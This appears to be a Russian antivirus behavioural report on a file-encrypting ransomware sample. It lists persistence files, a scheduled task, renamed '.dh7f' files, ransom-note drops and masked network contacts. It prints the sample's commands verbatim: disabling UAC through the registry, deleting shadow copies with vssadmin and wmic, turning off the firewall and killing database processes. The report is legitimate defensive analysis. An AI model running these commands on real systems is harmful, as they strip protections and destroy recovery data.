Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\microsoft_auto_scheduler
- %APPDATA%\microsoft\windows\start menu\programs\startup\desktopini.exe
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'
Создает следующие файлы на съемном носителе
- <Имя диска съемного носителя>:\roid4e readme.txt
- <Имя диска съемного носителя>:\correct.avi
- <Имя диска съемного носителя>:\delete.avi
- <Имя диска съемного носителя>:\000814251_video_01.avi
- <Имя диска съемного носителя>:\coffee.bmp
- <Имя диска съемного носителя>:\dialmap.bmp
- <Имя диска съемного носителя>:\dashborder_120.bmp
- <Имя диска съемного носителя>:\tileimage.bmp
- <Имя диска съемного носителя>:\dial.bmp
- <Имя диска съемного носителя>:\dashborder_144.bmp
- <Имя диска съемного носителя>:\testee.cer
- <Имя диска съемного носителя>:\testcertificate.cer
- <Имя диска съемного носителя>:\sdksampleprivdeveloper.cer
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует:
- Средство контроля пользовательских учетных записей (UAC)
удаляет теневые копии разделов.
Запускает на исполнение
- '%WINDIR%\syswow64\netsh.exe' firewall set opmode mode=disable
- '%WINDIR%\syswow64\taskkill.exe' /im mysqld-opt.exe
- '%WINDIR%\syswow64\taskkill.exe' /im dbeng50.exe
- '%WINDIR%\syswow64\taskkill.exe' /im sqbcoreservice.exe
- '%WINDIR%\syswow64\taskkill.exe' /im excel.exe
- '%WINDIR%\syswow64\taskkill.exe' /im infopath.exe
- '%WINDIR%\syswow64\taskkill.exe' /im msaccess.exe
- '%WINDIR%\syswow64\taskkill.exe' /im mysqld.exe
- '%WINDIR%\syswow64\taskkill.exe' /im mysqld-nt.exe
- '%WINDIR%\syswow64\taskkill.exe' /im mspub.exe
- '%WINDIR%\syswow64\taskkill.exe' /im powerpnt.exe
- '%WINDIR%\syswow64\taskkill.exe' /im steam.exe
- '%WINDIR%\syswow64\taskkill.exe' /im thebat.exe
- '%WINDIR%\syswow64\taskkill.exe' /im thebat64.exe
- '%WINDIR%\syswow64\taskkill.exe' /im thunderbird.exe
- '%WINDIR%\syswow64\taskkill.exe' /im visio.exe
- '%WINDIR%\syswow64\taskkill.exe' /im onenote.exe
- '%WINDIR%\syswow64\taskkill.exe' /im outlook.exe
- '%WINDIR%\syswow64\taskkill.exe' /im ocomm.exe
- '%WINDIR%\syswow64\taskkill.exe' /im tbirdconfig.exe
- '%WINDIR%\syswow64\taskkill.exe' /im firefoxconfig.exe
- '%WINDIR%\syswow64\taskkill.exe' /im msftesql.exe
- '%WINDIR%\syswow64\taskkill.exe' /im sqlagent.exe
- '%WINDIR%\syswow64\taskkill.exe' /im sqlbrowser.exe
- '%WINDIR%\syswow64\taskkill.exe' /im sqlservr.exe
- '%WINDIR%\syswow64\taskkill.exe' /im sqlwriter.exe
- '%WINDIR%\syswow64\taskkill.exe' /im oracle.exe
- '%WINDIR%\syswow64\taskkill.exe' /im ocssd.exe
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall set rule group="Network Discovery" new enable=Yes
- '%WINDIR%\syswow64\taskkill.exe' /im dbsnmp.exe
- '%WINDIR%\syswow64\taskkill.exe' /im agntsvc.exe
- '%WINDIR%\syswow64\taskkill.exe' /im mydesktopqos.exe
- '%WINDIR%\syswow64\taskkill.exe' /im isqlplussvc.exe
- '%WINDIR%\syswow64\taskkill.exe' /im xfssvccon.exe
- '%WINDIR%\syswow64\taskkill.exe' /im mydesktopservice.exe
- '%WINDIR%\syswow64\taskkill.exe' /im ocautoupds.exe
- '%WINDIR%\syswow64\taskkill.exe' /im encsvc.exe
- '%WINDIR%\syswow64\taskkill.exe' /im synctime.exe
- '%WINDIR%\syswow64\taskkill.exe' /im winword.exe
- '%WINDIR%\syswow64\taskkill.exe' /im wordpad.exe
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\appdata\h4_svc.bat
- C:\far2\addons\colors\custom_highlighting\roid4e readme.txt
- C:\far2\addons\colors\roid4e readme.txt
- C:\far2\addons\roid4e readme.txt
- C:\far2\roid4e readme.txt
- C:\documents and settings\roid4e readme.txt
- C:\$recycle.bin\roid4e readme.txt
- C:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1001\roid4e readme.txt
- C:\far2\addons\colors\default_highlighting\roid4e readme.txt
- D:\roid4e readme.txt
- C:\documents and settings\user\start menu\programs\startup\desktopini.exe
- %HOMEPATH%\appdata\f__d_d.sys
- nul
- %HOMEPATH%\appdata\renc.sys
- %WINDIR%\pagesfilo.sys
- %HOMEPATH%\appdata\t2_svc.bat
- %HOMEPATH%\appdata\v9_svc.vbs
- C:\roid4e readme.txt
- C:\far2\addons\macros\roid4e readme.txt
Изменяет следующие файлы
- D:\install.log.dh7f
- C:\far2\addons\colors\custom_highlighting\vaxcolors.reg.dh7f
- C:\far2\addons\colors\custom_highlighting\rodion_doroshkevich.reg.dh7f
- <Имя диска съемного носителя>:\testcertificate.cer.dh7f
- C:\far2\addons\colors\custom_highlighting\nc5pal2.reg.dh7f
- C:\far2\addons\colors\custom_highlighting\import_colors.bat.dh7f
- <Имя диска съемного носителя>:\testee.cer.dh7f
- C:\far2\addons\colors\custom_highlighting\hell.reg.dh7f
- <Имя диска съемного носителя>:\dashborder_144.bmp.dh7f
- C:\far2\addons\colors\custom_highlighting\greenmile.reg.dh7f
- <Имя диска съемного носителя>:\dial.bmp.dh7f
- <Имя диска съемного носителя>:\tileimage.bmp.dh7f
- C:\far2\addons\colors\custom_highlighting\farcolors242.reg.dh7f
- <Имя диска съемного носителя>:\sdksampleprivdeveloper.cer.dh7f
- <Имя диска съемного носителя>:\dashborder_120.bmp.dh7f
- C:\far2\addons\colors\custom_highlighting\dn_like.reg.dh7f
- <Имя диска съемного носителя>:\coffee.bmp.dh7f
- C:\far2\addons\colors\custom_highlighting\descript.ion.dh7f
- C:\far2\addons\colors\custom_highlighting\colors_from_sadovoj.reg.dh7f
- C:\far2\addons\colors\custom_highlighting\colors_from_gernichenko.reg.dh7f
- C:\far2\addons\colors\custom_highlighting\colors_from_admin_essp_ru.reg.dh7f
- C:\far2\addons\colors\custom_highlighting\black_from_myodov.reg.dh7f
- <Имя диска съемного носителя>:\000814251_video_01.avi.dh7f
- C:\far2\addons\colors\custom_highlighting\black_from_july.reg.dh7f
- C:\far2\addons\colors\custom_highlighting\black_from_fonarev.reg.dh7f
- <Имя диска съемного носителя>:\delete.avi.dh7f
- <Имя диска съемного носителя>:\correct.avi.dh7f
- <Имя диска съемного носителя>:\dialmap.bmp.dh7f
- C:\far2\addons\colors\default_highlighting\descript.ion.dh7f
Изменяет расширения файлов пользовательских данных (Trojan.Encoder).
Сетевая активность
Подключается к
- 'ap#.#pify.org':80
- '18#.#47.34.53':1572
TCP
Запросы HTTP GET
- http://ap#.#pify.org/
UDP
- DNS ASK ap#.#pify.org
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\syswow64\wscript.exe' "%HOMEPATH%\AppData\v9_svc.vbs"
- '%WINDIR%\syswow64\cmd.exe' /c ""%HOMEPATH%\AppData\h4_svc.bat" "' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c tasklist /v /fo csv | findstr /i "dcdcf"
- '%WINDIR%\syswow64\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- '%WINDIR%\syswow64\cmd.exe' /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall ...
- '%WINDIR%\syswow64\find.exe' /I "<Имя файла>.exe"
- '%WINDIR%\syswow64\tasklist.exe' /fi "ImageName eq <Имя файла>.exe" /fo csv
- '%WINDIR%\syswow64\find.exe' /i "original"
- '%WINDIR%\syswow64\cmd.exe' /c systeminfo|find /i "original"
- '%WINDIR%\syswow64\timeout.exe' /t 15 /nobreak
- '%WINDIR%\syswow64\find.exe' /i "os name"
- '%WINDIR%\syswow64\systeminfo.exe'
- '%WINDIR%\syswow64\cmd.exe' /c systeminfo|find /i "os name"
- '%WINDIR%\syswow64\cmd.exe' /c echo %date%-%time%
- '%WINDIR%\syswow64\find.exe' /I /c "dcdcf"
- '%WINDIR%\syswow64\tasklist.exe' /v
- '%WINDIR%\syswow64\cmd.exe' /c ""%HOMEPATH%\AppData\h4_svc.bat" "
- '%WINDIR%\syswow64\cmd.exe' /C echo %HOMEPATH%\AppData\h4_svc.bat
- '%WINDIR%\syswow64\schtasks.exe' /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'%HOMEPATH%\AppData\t2_svc.bat'" /f
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f
- '%WINDIR%\syswow64\cmd.exe' /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat
- '%WINDIR%\syswow64\cmd.exe' /c ver
- '%WINDIR%\syswow64\findstr.exe' /i "dcdcf"
- '%WINDIR%\syswow64\tasklist.exe' /v /fo csv
- '%WINDIR%\syswow64\netsh.exe' advfirewall set currentprofile state off
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /...
